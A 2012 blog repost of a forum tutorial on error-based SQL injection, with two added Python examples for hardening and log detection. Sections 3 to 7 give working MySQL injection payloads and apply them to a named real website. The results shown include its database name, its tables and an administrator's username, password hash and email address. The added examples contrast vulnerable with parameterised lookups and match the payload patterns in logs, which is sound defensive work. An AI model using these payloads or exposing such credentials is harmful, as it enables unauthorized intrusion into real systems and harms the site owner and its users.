Sunday, August 26, 2012

[Tut]Error-Based SQL Injection[/Tut]



Error-Based SQL Injection

Content
1.Introduction
2.About
3.Checking the version
4.Checking the database
5.Finding table names
6.Finding column names
7.Harvesting Data
8.Conclusion

1.Introduction
I haven't seen anyone start a topic on error-based SQL injection yet, so I opened this thread...
If there are mistakes, please come in, point them out and discuss...
First, let me ramble a little about SQL injection.

SQL injection can basically be divided into 4 types... some people say three...
1.Blind Based (also called Boolean)
2.Union Based (the most commonly used)
3.Error Based (covered here)
4.Double Query (to be covered later)

Number 1, Blind, is quite difficult... It needs a lot of guessing skill and experience... Most people avoid it (I have never once pulled it off successfully myself).
It can't be used in the Havij Free version either... It would be good to be able to buy the Pro version (go pester Ko Boss for it).

Number 2, Union... everyone already knows it... the famous leading man... Apart from occasionally being blocked by a firewall, it is widely used...

Number 3, Error Based... a really good method... When Union stops working, it is the savior...

Number 4, Double Q... it is the continuation of Error. True to its name, the query structure is quite long... Using it tends to return "Bad Request"... I don't like it much.....

Those are the commonly used ones... There is a whole pile of other, less used ones such as MS, Oracle and Header Based...
OK, enough rambling.... let's start....

2.About
Definition of Error-Based

A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information

In what situations can it be used....?
It can be used when, while using Union, you run into one of the errors below...

1. The Used Select Statements Have A Different Number Of Columns.
2. Unknown column 1 in order clause. (or 0)
3. Can't find your columns in the page source.
4. Error #1604

If you don't want to use Union, you can also go straight to it...
As a demo, I will use this site...
http://www.elansystems.co.za/product-item.php?product_items_id=11
 
3.Checking the version

First, the query to use for checking the version is

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


The resulting URL then looks like this ...

http://www.elansyste...uct_items_id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

The result will show up as a Duplicate entry error like this ...

Quote
Duplicate entry '5.1.63-0+squeeze1:1' for key 'group_key'
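
Added example, not part of the original post: the result above is only visible because the id parameter is concatenated into the SQL and the database's error text is printed back to the visitor. The sketch below contrasts that handling with a hardened lookup; it uses Python's sqlite3 and a constructed table as a stand-in for the PHP/MySQL page, and all function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed in-memory table standing in for the product page's data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product_items (product_items_id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO product_items VALUES (11, 'Sample item')")
    return db

def lookup_vulnerable(db, raw_id):
    """Weak handling: parameter concatenated into SQL, driver error echoed to the page."""
    sql = "SELECT name FROM product_items WHERE product_items_id=" + raw_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return 500, str(exc)              # database error text reaches the visitor
    return (200, row[0]) if row else (404, "not found")

def lookup_hardened(db, raw_id, log):
    """Hardened handling: strict integer check, bound parameter, generic errors."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        log.append(("rejected", raw_id))  # keep the raw value for the defender's log
        return 400, "invalid product id"
    try:
        row = db.execute(
            "SELECT name FROM product_items WHERE product_items_id=?",
            (int(raw_id),),
        ).fetchone()
    except sqlite3.Error as exc:
        log.append(("db_error", str(exc)))  # details go to the log, never to the page
        return 500, "internal error"
    return (200, row[0]) if row else (404, "not found")

if __name__ == "__main__":
    db, log = make_db(), []
    malformed = "11 and no_such_column=1"   # constructed malformed input
    print(lookup_vulnerable(db, malformed))     # error text is returned to the caller
    print(lookup_hardened(db, malformed, log))  # rejected before any SQL runs
    print(log)
```

On the real stack the same three controls apply: cast or validate the numeric parameter, use prepared statements, and turn off display of database errors in production.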
 
4.Checking the database

If you want to know the DB name, the query to use is
 
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
 
The resulting URL then looks like this ...

http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

The result will show up as a Duplicate entry error like this ...

Quote
Duplicate entry 'elansyst_elan~1' for key 'group_key'
Open Notepad and jot it down....
So, how about that? Easy, isn't it...

5.Finding table names
The query to use is...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Note: the limit function is used, and the table names are pulled out one at a time, increasing it by 1 each time....
In place of limit 0,1 use 1,1 .... 2,1 .... and so on, viewing the table names one by one...

The resulting URL then looks like this ...

http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
The result will show up as a Duplicate entry error like this ...
Quote
Duplicate entry 'dealer_tbl~1' for key 'group_key'
Keep looking.. stop when you find one that interests you...
Here the table 'wp_users' is looking very interesting.
So I will pull out the columns in users....

6.Finding column names
The query to use is...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

The places you need to change here are ...
1.Limit
2.Hex-encode the table_name (http://www.swingnote...s/texttohex.php)
This way, increasing the limit by 1 each time ... you will get the column names...


The resulting URL then looks like this ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x77705f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
The result will show up as a Duplicate entry error like this ...
Quote
Duplicate entry 'ID~1' for key 'group_key'

Column names - user_name , user_password , user-email are the interesting ones, right?
ok? .....

7.Harvesting Data
Once you have the column names that interest you, it is time to extract...
The query pattern to use is
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

The places you need to change are ...
1.Limit function (count 1 by 1)
2.Databasename (put in the name you jotted down earlier)
3.TableName (the table you are on now)
4.COLUMNNAME (the column that interests you)

The resulting URL then looks like this ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_login) as char),0x7e)) from elansyst_elan.wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
The result will show up as a Duplicate entry error like this ...
Quote
Duplicate entry 'elan_admin~1' for key 'group_key'

Carry on by yourself to work out the final answer.
Quote
elan_admin,$P$BG5yVgzxllpqcLrfwWR9q2TJ8jo8MR0 , darren@elansystems.co.za

8.Conclusion
I think this much is enough to understand it easily... This method is both useful and easy...
The weaknesses are
1.The query is long, so mistakes can creep in...
2.With Union, when you run into a firewall, WAF bypass works well.. with Error it is frustrating (I still can't do it myself either ..those who can, please explain it right below ... )
3.It takes a bit of hands-on work....
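
Added example, not part of the original post: every query in sections 3 to 7 uses floor(rand(0)*2) as a GROUP BY key, and every result comes back as a "Duplicate entry ... for key 'group_key'" message, so both are usable detection signals. The Python sketch below checks access-log lines and response bodies for them; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Markers shared by the queries on this page, matched after normalization.
MARKERS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "group_by": re.compile(r"\bgroup\s+by\b"),
    "count_star": re.compile(r"\bcount\s*\(\s*\*\s*\)"),
    "information_schema": re.compile(r"\binformation_schema\b"),
}
# Error text the page shows being printed back to the visitor.
DUP_ENTRY = re.compile(r"Duplicate entry '([^']*)' for key 'group_key'")

def normalize(raw):
    """Undo up to three URL-encoding layers, drop /*...*/ comments, fold case and spaces."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def request_markers(log_line):
    """Sorted names of the markers present in one access-log line."""
    text = normalize(log_line)
    return sorted(name for name, rx in MARKERS.items() if rx.search(text))

def is_error_based_probe(log_line):
    """Flag only when floor(rand()*2) appears together with GROUP BY."""
    hits = request_markers(log_line)
    return "floor_rand" in hits and "group_by" in hits

def reflected_error(response_body):
    """Value exposed by a reflected duplicate-key error, or None."""
    match = DUP_ENTRY.search(response_body)
    return match.group(1) if match else None

# Constructed access-log lines: addresses and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Aug/2012:10:00:01 +0000] "GET /product-item.php?product_items_id=11 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [26/Aug/2012:10:00:09 +0000] "GET /product-item.php?product_items_id=11%20or%201%20group%20by%20concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201-- HTTP/1.1" 200 812',
    '198.51.100.4 - - [26/Aug/2012:10:02:30 +0000] "GET /search.php?q=group+by+price HTTP/1.1" 200 2048',
]

def flag_lines(lines):
    """Indexes of the log lines that look like error-based probes."""
    return [i for i, line in enumerate(lines) if is_error_based_probe(line)]
```

A hit from reflected_error on an outgoing response means the application is still displaying database errors, which is the condition the whole technique depends on.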

copy from http://mmhackforums.com//index.php?/topic/669-tuterror-based-sql-injectiontut/





 
